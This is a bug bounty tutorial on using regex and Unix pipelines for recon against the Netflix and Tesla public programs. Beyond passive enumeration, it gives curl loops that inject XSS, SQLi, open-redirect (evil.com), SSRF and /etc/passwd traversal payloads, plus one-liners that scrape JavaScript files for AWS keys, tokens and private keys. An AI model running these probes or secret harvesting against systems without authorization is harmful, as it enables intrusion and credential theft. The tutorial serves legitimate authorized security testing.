TL;DR: Most bug bounty hunters drown in tool output and miss real findings. This article teaches you how to use regex and Unix pipes to filter signal from noise, covering passive recon, XSS, SQLi, open redirects, SSRF, LFI, and secret hunting, with real one-liners targeting Netflix and Tesla's public programs.

Introduction

There's a moment every bug bounty hunter knows. You've run subfinder, gau, katana, and waybackurls. Your terminal has scrolled past thousands of lines. You have a folder full of text files. And yet: nothing. No bugs. Just noise.

The hunters who consistently find vulnerabilities aren't necessarily running more tools. They're running smarter pipelines. They know how to take the raw, chaotic output of a dozen recon tools and distill it down to the twenty URLs that actually matter. The secret weapon behind that skill isn't a fancy paid tool or a zero-day exploit. It's regex and Unix pipes.

Regex (regular expressions) is the lens that lets you see patterns in text. Pipes are the glue that connects tools together into automated workflows. Together, they transform your terminal into a vulnerability finding machine. This article is a practical, no-fluff guide to mastering both in the context of bug bounty hunting.

We'll cover everything from a crash course in regex syntax to full recon pipelines, XSS hunting, secret extraction from JavaScript files, and a complete automated recon script. All examples use Netflix (bugcrowd.com/netflix) and Tesla (bugcrowd.com/tesla) as reference targets; both are public programs with broad scopes, making them ideal for demonstration. By the end of this article, you'll have a toolkit of one-liners and pipelines you can drop into your workflow immediately.

The Mindset: Think Like a Parser

Before we touch a single command, we need to talk about mindset. Every tool in your bug bounty arsenal (subfinder, gau, katana, nuclei, httpx) outputs text. That's it. Text to stdout. And text is just data. Data has patterns. Your job as a hunter is to find those patterns and extract meaning from them.

This is the Unix philosophy at its core: build small tools that do one thing well, and compose them together with pipes. grep finds patterns. sed transforms text. awk processes fields. sort and uniq deduplicate. jq parses JSON. None of these tools knows anything about bug bounty hunting, but when you chain them together with the right regex, they become a vulnerability scanner.

Think of your recon pipeline as a series of filters. Raw input comes in on the left. Each stage narrows the data down further. By the time you reach the right side of the pipe, you have a small, high-signal list of targets worth investigating manually.

The hunters who miss bugs are the ones who stare at raw tool output and try to manually spot something interesting. The hunters who find bugs are the ones who write a regex that pulls out exactly the URLs with redirect= or file= parameters, and then test only those. Automation handles the boring filtering. You handle the interesting exploitation. Regex is not optional in this workflow. It is the difference between finding a bug and missing it.

Regex Crash Course for Bug Hunters (Practical, Not Academic)

You don't need to memorize every regex feature. You need to know the twenty percent that covers ninety percent of real-world use cases in bug bounty. Here's that twenty percent.

The Basics

. matches any single character except newline. a.c matches abc, a1c, a-c.
* means zero or more of the preceding element. ab*c matches ac, abc, abbc.
+ means one or more. ab+c matches abc, abbc but not ac.
? means zero or one, making something optional. colou?r matches both color and colour.

In bug bounty, these basics show up constantly. Want to match any API key parameter regardless of spacing? api_key\s*=\s*\S+ uses \s* (zero or more whitespace) to handle both api_key=value and api_key = value .
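You can verify that against fabricated input right in the terminal (the key name and values here are made up):

```shell
# grep -c counts matching lines; \s* absorbs the optional whitespace,
# so both spacing styles match the same pattern
printf 'api_key=abc123\napi_key = abc123\n' | grep -cP 'api_key\s*=\s*\S+'
# prints: 2
```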

Character Classes

[abc] matches any single character in the set. [a-z] matches any lowercase letter.

[0-9] matches any digit.

[^abc] matches anything not in the set.

e.g. extracting subdomains from crt.sh output where you only want valid hostname characters:

grep -oP '[a-zA-Z0-9._-]+\.netflix\.com'

Anchors

^ anchors to the start of a line. $ anchors to the end. These are critical for avoiding false positives.

# Only match lines that START with http
grep '^http'

# Only match lines that END with .js
grep '\.js$'

Shorthand Classes

\d digit (same as [0-9])
\w word character (letters, digits, underscore)
\s whitespace
\D, \W, \S the negations (non-digit, non-word, non-whitespace)

These are PCRE features, so use grep -P or grep -oP to enable them.
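Here's a small PCRE demo combining these shorthands, pulling a status code out of a line shaped like httpx output (the line itself is fabricated):

```shell
# \[ matches the literal bracket, \K drops it from the output,
# \d+ grabs the digits, and (?=\]) requires the closing bracket
echo 'https://api.netflix.com [200] [Netflix]' | grep -oP '\[\K\d+(?=\])'
# prints: 200
```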

Groups and Non-Capturing Groups

(group) captures a match for backreference or extraction. (?:non-capture) groups without capturing, which is useful for applying quantifiers without storing the match.

# Capture the value after api_key=
grep -oP 'api_key=\K[^\s&]+'

Case Insensitive: (?i)

grep -oP '(?i)(api_key|apikey|api-key)\s*[=:]\s*\S+'

This matches API_KEY, api_key, Api-Key: all the variations developers use.
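A quick offline check with fabricated lines shows all three casings hit:

```shell
# (?i) makes the whole pattern case-insensitive; -c counts matching lines
printf 'API_KEY: x1\napi_key=y2\nApi-Key = z3\n' \
  | grep -cP '(?i)(api_key|apikey|api-key)\s*[=:]\s*\S+'
# prints: 3
```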

\K — The Secret Weapon

\K is a PCRE feature that resets the start of the match. Everything before \K is used as a lookbehind condition but is not included in the output. This is cleaner than a full lookbehind assertion.

# Without \K, you get the prefix too

grep -oP 'token=\S+'
# outputs: token=abc123


# With \K - you get only the value

grep -oP 'token=\K\S+' 
# outputs: abc123

In practice, \K is how you extract clean values from messy text without post-processing.

Lookahead and Lookbehind

(?=…) positive lookahead: match if followed by pattern
(?!…) negative lookahead: match if NOT followed by pattern
(?<=…) positive lookbehind: match if preceded by pattern
(?<!…) negative lookbehind: match if NOT preceded by pattern

# Extract URLs, but only those that carry a 'token' parameter
 grep -oP 'https?://(?=\S*[?&]token=)\S+'
# Extract the value after 'secret=' unless that value is 'null'
 grep -oP '(?<=secret=)(?!null\b)[^&\s]+'

Named Groups: (?P<name>…)

Named groups make complex extractions readable and are especially useful with Python or when building custom tooling.

# PCRE accepts the named-group syntax; the names pay off in Python or custom tooling
 grep -oP '(?P<subdomain>[a-zA-Z0-9-]+)\.tesla\.com'

Practical Extraction Patterns

Here are the regex patterns you'll use most in bug bounty:

# Extract all URLs from a page
 grep -oP 'https?://[^\s"'"'"'<>]+'
# Extract all query parameters
 grep -oP '[?&]\K[^=&]+'
# Extract JWT tokens
 grep -oP 'eyJ[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+'
# Extract AWS access keys
 grep -oP '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'
# Extract email addresses
 grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
# Extract IP addresses
 grep -oP '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'

Core Tools & What They Do

grep / grep -oP

The workhorse of text filtering. -o prints only the matching part (not the whole line). -P enables PCRE (Perl-Compatible Regular Expressions), unlocking \K , \d , lookaheads, etc.

# Install: pre-installed on most Linux distros
 grep -oP 'https?://[^\s"]+' file.txt

sed

Stream editor. Best for substitution and transformation.

# Remove everything after = (strip parameter values)
sed 's/=.*/=/'
# Remove wildcard prefix from crt.sh output
 sed 's/\*\.//g'

awk

Field-based text processing. Splits lines by delimiter and lets you work with columns.

# Print first and third fields (space-delimited)
 awk '{print $1, $3}'
# Print lines where field 2 equals 443
 awk '$2 == 443'

cut

Simpler field extraction than awk.

# Extract domain from "ip:port" format 

cut -d':' -f1 
#output: ip

sort -u

Sort and deduplicate in one step. Essential before feeding URLs into any tool to avoid redundant requests.

cat urls.txt | sort -u

uniq

Remove consecutive duplicate lines. Use after sort for deduplication, or with -c to count occurrences.

sort urls.txt | uniq -c | sort -rn | head -20

tr

Translate or delete characters. Useful for normalizing input.

# Convert commas to newlines
 echo "a,b,c" | tr ',' '\n'
# Lowercase everything
 cat file.txt | tr '[:upper:]' '[:lower:]'

jq

JSON parser for the command line. Critical for working with API responses.

# Install: apt install jq / brew install jq
 curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value'

This queries the open certificate transparency logs and prints every certified Netflix hostname, one per line.

curl

HTTP client. The -s flag silences progress output. -k skips TLS verification. -L follows redirects.

curl -sk -o /dev/null -w '%{http_code}' https://target.com

anew (tomnomnom)

Appends only new lines to a file, like tee but deduplicating. Safe to run pipelines multiple times without bloating output files.

# Install
 go install github.com/tomnomnom/anew@latest
subfinder -d netflix.com | anew subs.txt

uro

URL deduplication tool that removes URLs with the same path and parameter structure, keeping only unique patterns.

# Install
 pip3 install uro
cat urls.txt | uro

gf (tomnomnom)

Grep with named pattern files. Lets you run gf xss instead of remembering a long regex. You can also write your own pattern files and drop them into ~/.gf/.

# Install
 go install github.com/tomnomnom/gf@latest
 cat urls.txt | gf xss

Gxss and kxss

Pipeline tools for finding reflected XSS candidates. Gxss checks which parameters reflect input; kxss checks which characters are reflected unencoded.

go install github.com/KathanP19/Gxss@latest
go install github.com/tomnomnom/kxss@latest

katana (ProjectDiscovery)

Fast, modern web crawler with JavaScript rendering support.

go install github.com/projectdiscovery/katana/cmd/katana@latest
katana -u https://netflix.com -d 5 -f qurl

waybackurls / gau

Passive URL collection from Wayback Machine and other sources.

go install github.com/tomnomnom/waybackurls@latest
go install github.com/lc/gau/v2/cmd/gau@latest

subfinder / amass

Subdomain enumeration via passive sources.

go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

httpx

Fast HTTP probing: checks which hosts are alive, grabs status codes, titles, and tech stack.

#installation
go install github.com/projectdiscovery/httpx/cmd/httpx@latest

#basic usage
cat subs.txt | httpx -silent -status-code -title

nuclei

Template-based vulnerability scanner. Thousands of community templates for common CVEs and misconfigurations. You can also write your own YAML templates for program-specific checks.

# installation
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

#how to use with list of targets in a file
nuclei -l urls.txt -t ~/nuclei-templates/

ffuf

Fast web fuzzer for directories, parameters, and virtual hosts.

#installation
go install github.com/ffuf/ffuf/v2@latest

#basic usage
 ffuf -u https://netflix.com/FUZZ -w wordlist.txt -mc 200

hakrawler

Simple, fast web crawler focused on link and form extraction.

#installation
go install github.com/hakluke/hakrawler@latest

#basic usage
echo https://netflix.com | hakrawler

Passive Recon One-Liners (with Regex)

Passive recon is where every engagement starts. You're collecting data without touching the target directly, using certificate transparency logs, the Wayback Machine, and URL aggregators. The goal is to build a comprehensive picture of the attack surface before you send a single request to the target.

Here's the passive recon toolkit, demonstrated against Netflix and Tesla.

# Subdomain enum via crt.sh (Netflix)
 curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew subs.txt
# Subdomain enum via crt.sh (Tesla)
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[].name_value' | grep -v '^\*' | sort -u
# Wayback URLs
waybackurls netflix.com | uro | anew wayback.txt
# GAU passive URLs — filter for interesting file extensions
 gau --subs netflix.com | uro | grep -E '\.(php|asp|aspx|jsp|json|xml|env|bak|sql|log|conf|config|yaml|yml|ini|txt)$' | anew interesting.txt
# Extract all unique params from wayback (Tesla)
 waybackurls tesla.com | grep '?' | sed 's/=.*/=/' | sort -u | anew params.txt
# Find juicy endpoints by keyword
 gau netflix.com | grep -E '(api|admin|login|auth|token|key|secret|password|upload|file|debug|config|backup|internal)' | sort -u
# Cert transparency with clean hostname extraction (Tesla)
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[].name_value' | grep -oP '[a-zA-Z0-9._-]+\.tesla\.com' | sort -u

Let's break down what's happening in each pipeline. The crt.sh query returns JSON; jq -r '.[].name_value' extracts the domain name field from every certificate entry. sed 's/\*\.//g' strips wildcard prefixes like *.api.netflix.com down to api.netflix.com. sort -u deduplicates. anew appends only new entries to the output file.
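You can watch those cleanup stages work on fabricated crt.sh-style names without sending a single request:

```shell
# Strip wildcard prefixes, then deduplicate; the first two names collapse
printf '*.api.netflix.com\napi.netflix.com\ncdn.netflix.com\n' \
  | sed 's/\*\.//g' | sort -u
# api.netflix.com
# cdn.netflix.com
```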

The GAU pipeline is particularly powerful. By filtering for specific file extensions, you're not just collecting URLs; you're immediately triaging them. A .env file in the Wayback Machine is a critical finding. A .bak file might contain source code. .sql files might contain database dumps. This single one-liner can surface critical vulnerabilities before you've touched the target.

In the parameter extraction pipeline, sed 's/=.*/=/' strips parameter values, leaving you with clean parameter names like ?redirect= and ?file=. This is your input for vulnerability-specific testing later.
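It's worth seeing exactly what that sed does on a made-up URL; note that on multi-parameter URLs it truncates everything after the first '=', so trailing parameters are dropped:

```shell
# s/=.*/=/ replaces everything from the first '=' to end-of-line with '='
echo 'https://tesla.com/page?redirect=https://evil.example&x=1' | sed 's/=.*/=/'
# prints: https://tesla.com/page?redirect=
```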

Active Recon Pipeline (Full Workflow)

Once passive recon is done, you move to active recon — actually touching the target. This is where you enumerate live hosts, crawl for URLs, and build the full URL corpus you'll use for vulnerability testing.

#Setup
export TARGET="netflix.com"
export OUT="./recon/$TARGET"
mkdir -p $OUT

Step 1: Subdomain enum


 subfinder -d $TARGET -silent | anew $OUT/subs.txt
 curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew $OUT/subs.txt

Step 2: Probe live hosts


cat $OUT/subs.txt | httpx -silent -status-code -title -tech-detect | anew $OUT/live.txt

Step 3: Crawl


 katana -u "https://$TARGET" -d 5 -f qurl | uro | anew $OUT/urls.txt

Step 4: Passive URLs


 gau --subs $TARGET | uro | anew $OUT/urls.txt
 waybackurls $TARGET | uro | anew $OUT/urls.txt

Step 5: Filter by extension


cat $OUT/urls.txt | grep -E '\.(js|json|xml|env|bak|sql|log|conf|yaml|yml|ini|txt|php|asp|aspx|jsp)$' | anew $OUT/interesting.txt

The httpx step is critical and often skipped by beginners. Subfinder might return 500 subdomains, but only 80 of them are actually live. Running nuclei or katana against all 500 wastes time and generates noise. Probing first with httpx and working only from live.txt is a discipline that separates efficient hunters from slow ones.

The -tech-detect flag on httpx is a bonus: it identifies the technology stack (WordPress, React, Django, etc.), which immediately tells you what vulnerability classes to prioritize.

The URL collection step combines three sources: active crawling with katana, and passive collection from GAU and Wayback. Each source finds URLs the others miss. Katana finds URLs that only appear in JavaScript or behind authenticated flows. GAU and Wayback find historical URLs that may have been removed from the live site but still work.

uro is the unsung hero here. Without it, you might have 50,000 URLs that are really just 2,000 unique patterns with different parameter values. uro collapses ?id=1 , ?id=2 , ?id=3 into a single entry, dramatically reducing the work downstream tools need to do.
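To build intuition for what uro does, here's a crude sed-based approximation (the real tool is far smarter about path patterns and extensions; this sketch only blanks parameter values before deduplicating):

```shell
# Blank every =value, then deduplicate: three URLs collapse to one pattern
printf 'https://t.com/a?id=1\nhttps://t.com/a?id=2\nhttps://t.com/a?id=3\n' \
  | sed 's/=[^&]*/=/g' | sort -u
# prints: https://t.com/a?id=
```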

XSS Hunting Pipeline

Cross-site scripting remains one of the most commonly reported vulnerabilities in bug bounty programs. The challenge isn't finding parameters; it's finding parameters that actually reflect input without encoding it. That's where the Gxss and kxss pipeline shines.

Full XSS pipeline

# Crawl for parameterized URLs
 katana -u "https://netflix.com" -d 5 -f qurl | uro | anew $OUT/urls.txt

# Check which parameters reflect unencoded characters
 cat $OUT/urls.txt | Gxss | kxss | grep -oP '^URL: \K\S+' | sed 's/=.*/=/' | sort -u > $OUT/xss_candidates.txt

Manual test with curl


curl -sk "$(cat $OUT/xss_candidates.txt | head -1)xsstest%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" | grep -oP '(?<=value=")[^"]*xsstest[^"]*'
# Grep reflected params
 cat $OUT/urls.txt | grep '=' | while read url; do
 param=$(echo $url | grep -oP '[?&]\K[^=]+(?==)')
 curl -sk "${url}FUZZ" | grep -q 'FUZZ' && echo "[REFLECTED] $url"
 done

The pipeline works in stages. Gxss injects a canary string into each parameter and checks if it appears in the response. kxss then checks which special characters (<, >, ", ') are reflected unencoded; these are the characters you need for XSS. The grep -oP '^URL: \K\S+' extracts just the URL from kxss output, and sed 's/=.*/=/' strips the value so you have a clean injection point.

The manual curl test URL-encodes a basic XSS payload and checks if it appears in a value= attribute context, one of the most common reflection points. The (?<=value=") lookbehind anchors the match to that specific context. The while read loop at the bottom is a simple but effective reflection checker. For each URL, it extracts the parameter name, appends FUZZ as the value, and checks if FUZZ appears literally in the response. If it does, the parameter reflects input, which is a prerequisite for XSS.
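The parameter-name extraction inside that loop is easy to test in isolation against a made-up URL:

```shell
# [?&]\K anchors on the delimiter but drops it; (?==) requires a value to follow
echo 'https://netflix.com/search?q=test&page=2' | grep -oP '[?&]\K[^=]+(?==)'
# q
# page
```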

Open Redirect Hunting

Open redirects are valuable both as standalone findings and as stepping stones to more severe vulnerabilities like OAuth token theft. The key is finding parameters that control where the application redirects after an action.

#Extract redirect params
cat $OUT/urls.txt | gf redirect | sed 's/=.*/=/' | sort -u > $OUT/redirect.txt
# Test with curl following redirects
 cat $OUT/redirect.txt | while read url; do
 result=$(curl -sk -o /dev/null -w '%{redirect_url}' "${url}https://evil.com")
 echo $result | grep -q 'evil.com' && echo "[OPEN REDIRECT] $url"
 done
# One-liner version
 cat $OUT/redirect.txt | xargs -I{} curl -sk -o /dev/null -w '%{url_effective} -> %{redirect_url}\n' "{}https://evil.com" | grep 'evil.com'

The gf redirect pattern matches common redirect parameter names: redirect , redirect_uri , return , returnTo , next , url , goto , destination, and many more. The sed 's/=.*/=/' strips existing values so you can inject your own.

The curl -w '%{redirect_url}' flag is the key here: it prints the URL that the server redirected to, without following it. If that URL contains evil.com, you have an open redirect. The -o /dev/null discards the response body since you only care about the redirect header.

The xargs -I{} one-liner version is faster for large lists because it doesn't spawn a subshell for each URL. The %{url_effective} shows the final URL after all redirects, while %{redirect_url} shows the first redirect target; both are useful for different redirect scenarios.

SQLi Hunting

SQL injection is rarer in modern applications but still appears regularly in bug bounty programs, especially in legacy endpoints, admin panels, and API parameters. The approach here is error-based detection — injecting a single quote and looking for database error messages in the response.

# Extract SQLi candidates
 cat $OUT/urls.txt | gf sqli | sed 's/=.*/=/' | sort -u > $OUT/sqli.txt
# Quick error-based test
 cat $OUT/sqli.txt | while read url; do
 curl -sk "${url}'" | grep -iE "(sql syntax|mysql_fetch|ORA-|pg::|sqlite_error|ODBC SQL)" && echo "[SQLI] $url"
 done
# With nuclei
 nuclei -l $OUT/sqli.txt -t ~/nuclei-templates/vulnerabilities/generic/sqli-error-based.yaml -o $OUT/sqli_findings.txt

The regex in the grep step covers error messages from the most common database engines: MySQL (sql syntax, mysql_fetch), Oracle (ORA-), PostgreSQL (pg::), SQLite (sqlite_error), and generic ODBC drivers. The -i flag makes the match case-insensitive (the PCRE equivalent is (?i)), which handles variations in how different frameworks format error messages.

The nuclei approach is complementary: it uses curated templates that test more injection patterns and error signatures than a simple quote injection. Running both gives you better coverage.

One important note: always URL-encode your payloads when injecting through curl. A raw single quote in a URL can cause curl to misparse the argument. Use %27 instead of ' when in doubt.
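curl won't encode for you, but a few lines of bash can. This urlencode helper is a hypothetical convenience function (not part of any tool above) that percent-encodes every byte outside the RFC 3986 unreserved set:

```shell
# Hypothetical helper: percent-encode all but unreserved characters (bash)
urlencode() {
  local s=$1 out= c i
  for (( i=0; i<${#s}; i++ )); do
    c=${s:i:1}
    case $c in
      [a-zA-Z0-9.~_-]) out+=$c ;;                    # unreserved: pass through
      *) out+=$(printf '%%%02X' "'$c") ;;           # everything else: %XX
    esac
  done
  printf '%s\n' "$out"
}
urlencode "' OR 1=1--"
# prints: %27%20OR%201%3D1--
```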

Secret / API Key Hunting in JavaScript

JavaScript files are goldmines. Developers frequently hardcode API keys, tokens, and credentials in frontend JavaScript — sometimes intentionally (for client-side SDKs), sometimes accidentally (committing debug code). Either way, it's your job to find them.

# Extract all JS files
 cat $OUT/urls.txt | grep '\.js$' | sort -u > $OUT/jsfiles.txt
# Download and grep for secrets
 cat $OUT/jsfiles.txt | while read url; do
 curl -sk "$url" | grep -oP '(api[_-]?key|apikey|api[_-]?secret|access[_-]?token|secret[_-]?key)\s*[=:]\s*["\x27][a-zA-Z0-9_\-]{20,}["\x27]'
 done | sort -u > $OUT/secrets.txt
# AWS keys
 cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'
# GitHub tokens
 cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP 'ghp_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9_]{82}'
# Private keys
 cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP '-----BEGIN [A-Z ]*PRIVATE KEY-----'

The general secrets regex matches common naming patterns: api_key, api-key, api_secret, access_token, secret_key (prepend (?i) to also catch API_KEY and apiKey casing). The {20,} quantifier requires at least 20 characters; this filters out placeholder values like YOUR_API_KEY_HERE while catching real secrets.

The AWS key regex is precise and based on the actual format Amazon uses. AWS access key IDs always start with one of those specific prefixes (AKIA for long-term keys, ASIA for temporary session keys, etc.) followed by exactly 16 uppercase alphanumeric characters. This pattern has an extremely low false positive rate.
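You can sanity-check the pattern offline against AWS's documented example key ID (AKIAIOSFODNN7EXAMPLE, a non-functional placeholder):

```shell
# The prefix alternation plus exactly 16 [A-Z0-9] pulls the key out of context
echo 'config = { key: "AKIAIOSFODNN7EXAMPLE" }' \
  | grep -oP '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'
# prints: AKIAIOSFODNN7EXAMPLE
```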

The xargs -I{} approach is faster than a while read loop for simple cases because it avoids subshell overhead. The -P5 flag (parallel execution with 5 workers) can speed this up further for large JS file lists:

cat $OUT/jsfiles.txt | xargs -P5 -I{} curl -sk {} | grep -oP 'AKIA[A-Z0-9]{16}'

SSRF Hunting

Server-Side Request Forgery lets you make the target server send requests on your behalf potentially reaching internal services, cloud metadata endpoints, or other restricted resources. Finding SSRF requires identifying parameters that accept URLs or hostnames.

# Extract SSRF-prone params
 cat $OUT/urls.txt | gf ssrf | sed 's/=.*/=/' | sort -u > $OUT/ssrf.txt
# Test with interactsh (replace with your interactsh URL)
 INTERACT="your-id.oast.fun"
 cat $OUT/ssrf.txt | while read url; do
 curl -sk "${url}https://$INTERACT" &
 done
 # Then check interactsh for callbacks

The gf ssrf pattern matches parameters like url, uri, path, dest, destination, redirect, proxy, fetch, load, src, source, href, link, callback, host, endpoint, and similar names that suggest the server might fetch a URL.

The interactsh approach is the gold standard for SSRF detection. Instead of pointing at evil.com which you don't control, you use an interactsh server that logs every incoming request. If the target server fetches your URL, you'll see the callback in the interactsh dashboard — even if the response to your original request gives no indication that a fetch occurred.

The & at the end of the curl command runs it in the background, allowing you to test many URLs in parallel. Just make sure to wait at the end of the loop if you need to ensure all requests complete before checking interactsh.

LFI Hunting

Local File Inclusion vulnerabilities allow reading arbitrary files from the server's filesystem. They're most common in PHP applications but appear in other stacks too. The classic test is path traversal to /etc/passwd .

# Extract file/path params
 cat $OUT/urls.txt | gf lfi | sed 's/=.*/=/' | sort -u > $OUT/lfi.txt
# Test traversal
 cat $OUT/lfi.txt | while read url; do
 curl -sk "${url}../../../etc/passwd" | grep -q 'root:' && echo "[LFI] $url"
 done

The gf lfi pattern matches parameters like file , path , page , include , template , view , doc , document , folder , root , pg , style , and similar names that suggest file path handling.

The grep -q 'root:' check looks for the characteristic first line of /etc/passwd — root:x:0:0:root:/root:/bin/bash . If that string appears in the response, you have confirmed LFI. The -q flag makes grep silent (no output) and just sets the exit code, which the && operator uses to conditionally print the finding.
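You can see that exit-code behavior without any target, using a line copied from a typical /etc/passwd:

```shell
# grep -q prints nothing and only sets the exit code; && fires on a hit
echo 'root:x:0:0:root:/root:/bin/bash' | grep -q 'root:' && echo '[LFI] hit'
# prints: [LFI] hit
```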

For deeper testing, consider also trying Windows paths ..\..\windows\win.ini and null byte injection ../../../etc/passwd%00 for older PHP versions.

Advanced jq + curl Tricks

JSON is everywhere in modern web applications API responses, configuration endpoints, certificate transparency logs, search APIs. jq is your scalpel for extracting exactly what you need from JSON data.

# Parse Shodan for a target
 shodan search 'hostname:netflix.com' --fields ip_str,port,org | awk '{print $1":"$2}' | anew $OUT/shodan.txt
# crt.sh with full JSON parsing — name, issuer, and issue date
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[] | [.name_value, .issuer_name, .not_before] | @tsv' | grep -v '^\*' | sort -u
# Extract emails from crt.sh (sometimes appears in cert subject)
 curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value' | grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' | sort -u
# GitHub dorks via API (public)
 curl -s -H "Accept: application/vnd.github.v3+json" "https://api.github.com/search/code?q=netflix.com+api_key&per_page=10" | jq -r '.items[].html_url'
# Wayback CDX API (raw, high volume)
 curl -s "http://web.archive.org/cdx/search/cdx?url=*.netflix.com/*&output=json&fl=original&collapse=urlkey&limit=10000" | jq -r '.[] | .[0]' | grep -v 'original' | uro | anew $OUT/wayback_cdx.txt

The @tsv filter in jq formats an array as tab-separated values perfect for piping into awk or cut for further processing. The [.name_value, .issuer_name, .not_before] constructs an array from three fields before formatting.
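You can exercise the @tsv filter on an inline sample (a fabricated crt.sh-style entry) before pointing it at the real API:

```shell
# jq builds a three-element array per entry and emits it tab-separated
echo '[{"name_value":"api.tesla.com","issuer_name":"R3","not_before":"2025-01-02"}]' \
  | jq -r '.[] | [.name_value, .issuer_name, .not_before] | @tsv'
# prints: api.tesla.com<TAB>R3<TAB>2025-01-02
```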

The Wayback CDX API is more powerful than waybackurls for large targets. It supports filtering by MIME type, status code, and date range. The collapse=urlkey parameter deduplicates by URL structure (similar to uro), and limit=10000 caps the results. For very large targets like Netflix, you may want to paginate or filter by subdomain.

The GitHub code search API is a passive recon goldmine. Developers push code containing hardcoded credentials, internal hostnames, and API endpoints to public repositories. The API is rate-limited for unauthenticated requests, so use a token if you're doing this regularly.

One powerful jq pattern worth memorizing is select() for filtering:

# Only show crt.sh entries issued in the last year
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[] | select(.not_before > "2025-01-01") | .name_value' | sort -u

The gf Pattern Library

gf (grep-friendly) is one of the most underrated tools in the bug bounty ecosystem. Created by tomnomnom, it's essentially a wrapper around grep that lets you save and reuse named regex patterns. Instead of remembering a 200-character regex for XSS parameters, you just run gf xss.

Full Automated Recon Script

Everything we've covered so far comes together in this script. Save it as recon.sh , make it executable, and run it against any target in scope.

#!/bin/bash
# recon.sh - Full Bug Bounty Recon Pipeline
# Usage: ./recon.sh netflix.com
TARGET=$1
OUT="./recon/$TARGET"
mkdir -p $OUT/{subs,urls,vulns,secrets,js}
echo "[*] Starting recon on $TARGET"
# Passive subs
echo "[*] Subdomain enum…"
subfinder -d $TARGET -silent | anew $OUT/subs/subs.txt
curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew $OUT/subs/subs.txt
# Probe
echo "[*] Probing live hosts…"
cat $OUT/subs/subs.txt | httpx -silent | anew $OUT/subs/live.txt
# URLs
echo "[*] Collecting URLs…"
gau --subs $TARGET | uro | anew $OUT/urls/all.txt
waybackurls $TARGET | uro | anew $OUT/urls/all.txt
katana -list $OUT/subs/live.txt -d 3 -f qurl -silent | uro | anew $OUT/urls/all.txt
# Filter
cat $OUT/urls/all.txt | grep -E '\.(js)$' | anew $OUT/js/files.txt
cat $OUT/urls/all.txt | gf xss | sed 's/=.*/=/' | sort -u > $OUT/vulns/xss.txt
cat $OUT/urls/all.txt | gf sqli | sed 's/=.*/=/' | sort -u > $OUT/vulns/sqli.txt
cat $OUT/urls/all.txt | gf redirect | sed 's/=.*/=/' | sort -u > $OUT/vulns/redirect.txt
cat $OUT/urls/all.txt | gf ssrf | sed 's/=.*/=/' | sort -u > $OUT/vulns/ssrf.txt
cat $OUT/urls/all.txt | gf lfi | sed 's/=.*/=/' | sort -u > $OUT/vulns/lfi.txt
# Secrets in JS
echo "[*] Hunting secrets in JS…"
cat $OUT/js/files.txt | xargs -P5 -I{} curl -sk {} | grep -oP '(api[_-]key|apikey|secret|token|password)\s*[=:]\s*["\x27][a-zA-Z0-9_\-]{16,}["\x27]' | sort -u > $OUT/secrets/js_secrets.txt
# Summary
echo ""
echo "===== RECON SUMMARY ====="
echo "Subdomains: $(wc -l < $OUT/subs/subs.txt)"
echo "Live hosts: $(wc -l < $OUT/subs/live.txt)"
echo "Total URLs: $(wc -l < $OUT/urls/all.txt)"
echo "JS files: $(wc -l < $OUT/js/files.txt)"
echo "XSS candidates: $(wc -l < $OUT/vulns/xss.txt)"
echo "SQLi candidates: $(wc -l < $OUT/vulns/sqli.txt)"
echo "Redirect candidates: $(wc -l < $OUT/vulns/redirect.txt)"
echo "Secrets found: $(wc -l < $OUT/secrets/js_secrets.txt)"
echo "========================="

This script is intentionally modular. Each section is independent: if subfinder is slow, you can comment it out and run only crt.sh. If you're revisiting a target, the anew calls mean re-running the script only adds new findings rather than duplicating existing ones.

The -P5 flag on xargs runs five curl requests in parallel for JS file downloading. Adjust this based on your connection speed and the target's rate limiting. For large programs like Netflix with thousands of JS files, parallel downloading can cut this step from hours to minutes.

Pro Tips & Secrets

These are the techniques that separate hunters who find bugs from hunters who find noise.

\K resets the match start. Instead of grep -oP '(?<=token=)\S+' (which requires a fixed-width lookbehind), use grep -oP 'token=\K\S+'. It's cleaner, more readable, and works with variable-length prefixes.

anew is idempotent. Unlike >> which blindly appends, anew only adds lines that aren't already in the file. This means you can re-run your entire pipeline against a target you've already scanned, and you'll only see new findings. Build this habit from day one.
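If you want a feel for what anew is doing (or a stopgap when Go isn't installed), this grep-based emulation approximates it; unlike the real anew, it doesn't echo the newly added lines to stdout:

```shell
# Append only lines not already present: -x matches whole lines, -F literally
seen=$(mktemp)
printf 'a.netflix.com\n' >> "$seen"
printf 'a.netflix.com\nb.netflix.com\n' | grep -vxFf "$seen" >> "$seen"
cat "$seen"
# a.netflix.com
# b.netflix.com
```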

